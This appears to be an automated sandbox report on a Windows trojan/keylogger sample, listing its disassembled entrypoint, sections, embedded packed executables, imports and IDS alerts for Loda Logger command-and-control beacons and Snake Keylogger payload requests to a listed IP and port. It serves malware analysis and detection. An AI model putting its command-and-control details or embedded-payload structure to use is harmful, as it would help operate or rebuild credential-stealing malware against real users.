                                                                                                                    Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    add esp, FFFFFFF0h
                                                                                                                    mov eax, 0049A778h
                                                                                                                    call 00007FD770C0A11Dh
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007FD770C5DA65h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, 0049ABE0h
                                                                                                                    call 00007FD770C5D664h
                                                                                                                    mov ecx, dword ptr [0049DBDCh]
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, dword ptr [00496590h]
                                                                                                                    call 00007FD770C5DA54h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007FD770C5DAC8h
                                                                                                                    call 00007FD770C07BFBh
                                                                                                                    add byte ptr [eax], al

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000xf1330.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0xb00000xf13300xf1400c51e0c30e46396d53fc764e9203de990False0.8937469640544041data7.778177022487087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                    RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                    RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                    RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                    RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                    RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                    RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                    RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                    RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                    RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                    RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                    RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                    RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                    RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                    RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                    RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                    RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                    RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                    RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.1472795497185741
                                                                                                                    RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                    RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                    RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                    RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                    RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                    RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                    RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                    RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                    RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                    RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                    RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                    RT_STRING0xb67b80xdcdata0.6
                                                                                                                    RT_STRING0xb68940x320data0.45125
                                                                                                                    RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                    RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                    RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                    RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                    RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                    RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                    RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                    RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                    RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                    RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                    RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                    RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                    RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                    RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                    RT_RCDATA0xb8e040x10data1.5
                                                                                                                    RT_RCDATA0xb8e140xdf600PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.925556099608282
                                                                                                                    RT_RCDATA0x1984140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                    RT_RCDATA0x1984180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                    RT_RCDATA0x19c0180x64cdata0.5998759305210918
                                                                                                                    RT_RCDATA0x19c6640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                    RT_RCDATA0x19c7b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                    RT_GROUP_CURSOR0x1a0f8c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                    RT_GROUP_CURSOR0x1a0fa00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                    RT_GROUP_CURSOR0x1a0fb40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                    RT_GROUP_CURSOR0x1a0fc80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                    RT_GROUP_CURSOR0x1a0fdc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                    RT_GROUP_CURSOR0x1a0ff00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                    RT_GROUP_CURSOR0x1a10040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                    RT_GROUP_ICON0x1a10180x14dataTurkishTurkey1.1
                                                                                                                    RT_VERSION0x1a102c0x304dataTurkishTurkey0.42875647668393785

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                    user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                    advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                    kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                    user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                    ole32.dllCLSIDFromString
                                                                                                                    kernel32.dllSleep
                                                                                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                    ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                    oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                    comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                    shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                    wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                    shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                    advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                    wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                    netapi32.dllNetbios

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    TurkishTurkey

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949947172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949978172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949963172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949975172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949858172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949974172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949970172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949961172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949763172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949973172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949979172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949714172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949969172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949980172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949900172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:05.075916+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949810172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:23.838165+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.949714172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:23.838165+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949714172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:24.988069+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949713142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:24.990750+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949712142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:25.431526+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.94971769.42.215.25280TCP
                                                                                                                    2024-12-30T11:25:26.056444+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949718142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:26.056674+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949719142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:27.032939+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949725142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:27.130273+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949724142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:28.294363+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949731142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:28.441965+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949732142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:29.692255+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949742142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:29.761749+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949744142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:30.704750+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949747142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:30.731735+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949749142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:31.923473+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949752142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:31.932583+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949754142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:32.707722+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949757142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:32.707813+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949758142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:32.916466+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949763172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:33.938549+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949762142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:33.971633+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949764142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:35.104833+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949769142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:35.117302+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949771142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:36.144331+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949773142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:36.148561+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949772142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:37.718341+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949785142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:37.819807+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949784142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:38.987363+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949787142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:39.121172+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949790142.250.185.78443TCP
                                                                                                                    2024-12-30T11:25:42.354112+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949810172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:25:51.447538+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949858172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:00.494591+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949900172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:09.557313+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949947172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:18.635902+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.949961172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:18.635902+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949961172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:27.682320+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949963172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:37.051771+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949969172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:46.088465+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949970172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:55.572883+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.949973172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:26:55.572883+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949973172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:27:04.635470+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949974172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:27:14.049429+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949975172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:27:30.214088+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949978172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:27:44.167160+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.949979172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:27:44.167160+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949979172.111.138.1005552TCP
                                                                                                                    2024-12-30T11:27:53.229380+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.949980172.111.138.1005552TCP

